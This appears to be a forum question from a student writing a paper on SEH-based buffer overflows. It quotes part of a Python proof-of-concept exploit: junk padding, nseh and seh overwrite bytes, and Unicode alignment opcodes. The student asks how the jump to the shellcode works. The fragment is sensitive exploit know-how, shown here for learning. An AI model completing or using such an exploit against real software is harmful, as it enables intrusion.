I am trying to understand how an SEH-based buffer overflow works, and I have to write a paper about how an exploit works. I took this PoC for my paper.
```python
junk = "\x41" * 4091
nseh = "\x61\x62"
seh = "\x57\x42"  # Overwrite Seh # 0x00420057 : {pivot 8}
prepare = "\x44\x6e\x53\x6e\x58\x6e\x05"
prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
prepare += "\x41" * 107; ...
```
I don’t really understand how it’s jumping over the next SEH.

- What is `\x61\x62` used for in the `nseh` variable?
- What is the `prepare` variable used for?
- How is it jumping to the shellcode?

I already understand that the `\x57\x42` is used as a pointer to target a `pop pop ret` to trigger a second error, but I am stuck after that…